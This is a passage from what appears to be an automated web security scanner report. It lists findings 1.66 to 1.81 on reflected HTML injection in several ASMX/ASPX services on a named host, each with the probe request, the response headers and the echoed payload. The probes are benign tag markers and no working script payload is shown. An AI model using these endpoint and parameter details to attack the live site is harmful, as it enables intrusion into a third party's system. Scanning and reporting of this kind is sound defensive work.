<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&a014e<a>6ade69e1294=1/ChannelInfoService.asmx" />
...[SNIP]...

1.66. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload e429d<a>9a69387f93 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793e429d<a>9a69387f93 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:23:21 GMT
Connection: close
Content-Length: 20165

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793e429d<a>9a69387f93/ChannelInfoService.asmx" />
...[SNIP]...

1.67. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e29d7<a>b1a3288f611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&e29d7<a>b1a3288f611=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:46 GMT
Content-Length: 22408
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&e29d7<a>b1a3288f611=1/ClipInfoService.asmx" />
...[SNIP]...

1.68. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 498aa<a>e0fd8eb2d55 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793498aa<a>e0fd8eb2d55 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:45 GMT
Content-Length: 22396
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793498aa<a>e0fd8eb2d55/ClipInfoService.asmx" />
...[SNIP]...

1.69. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6a8d2<a>17423d31d6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&6a8d2<a>17423d31d6d=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:51 GMT
Content-Length: 5637
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&6a8d2<a>17423d31d6d=1/ErrorInfoService.asmx" />
...[SNIP]...

1.70. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload dc61b<a>d0ae21d4f0d was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793dc61b<a>d0ae21d4f0d HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:50 GMT
Content-Length: 5625
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793dc61b<a>d0ae21d4f0d/ErrorInfoService.asmx" />
...[SNIP]...

1.71. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 86197<a>4a43d3f7b2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&86197<a>4a43d3f7b2b=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:23:22 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&86197<a>4a43d3f7b2b=1/PlaylistInfoService.asmx" />
...[SNIP]...

1.72. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload b9c7e<a>35d09de45cf was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793b9c7e<a>35d09de45cf HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:23:21 GMT
Connection: close
Content-Length: 27386

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793b9c7e<a>35d09de45cf/PlaylistInfoService.asmx" />
...[SNIP]...

1.73. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5469e<a>513a789c5d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&5469e<a>513a789c5d2=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:50 GMT
Content-Length: 8814
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&5469e<a>513a789c5d2=1/RSSService.asmx" />
...[SNIP]...

1.74. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 73e9a<a>69fb6f0fe85 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379373e9a<a>69fb6f0fe85 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:49 GMT
Content-Length: 8802
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379373e9a<a>69fb6f0fe85/RSSService.asmx" />
...[SNIP]...

1.75. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ccd3<a>bf3a55c6529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&4ccd3<a>bf3a55c6529=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:50 GMT
Content-Length: 5534
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793&4ccd3<a>bf3a55c6529=1/RatingService.asmx" />
...[SNIP]...

1.76. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload cf92f<a>bc8ac13f1f3 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793cf92f<a>bc8ac13f1f3 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 02:38:48 GMT
Content-Length: 5522
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233793cf92f<a>bc8ac13f1f3/RatingService.asmx" />
...[SNIP]...

1.77. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 764aa<a>4eb8c021511 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&764aa<a>4eb8c021511=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:02 GMT
Content-Length: 1913
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&764aa<a>4eb8c021511=1/AdServerService.asmx" />
...[SNIP]...

1.78. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload dd15e<a>c58085d49ac was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796dd15e<a>c58085d49ac HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:00 GMT
Content-Length: 1907
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796dd15e<a>c58085d49ac/AdServerService.asmx" />
...[SNIP]...

1.79. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d8592<a>7f38885c00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&d8592<a>7f38885c00=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:45:47 GMT
Connection: close
Content-Length: 20177

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796&d8592<a>7f38885c00=1/ChannelInfoService.asmx" />
...[SNIP]...

1.80. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload af957<a>c761acd24e8 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796af957<a>c761acd24e8 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:45:46 GMT
Connection: close
Content-Length: 20169

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796af957<a>c761acd24e8/ChannelInfoService.asmx" />
...[SNIP]...

1.81. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233796/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
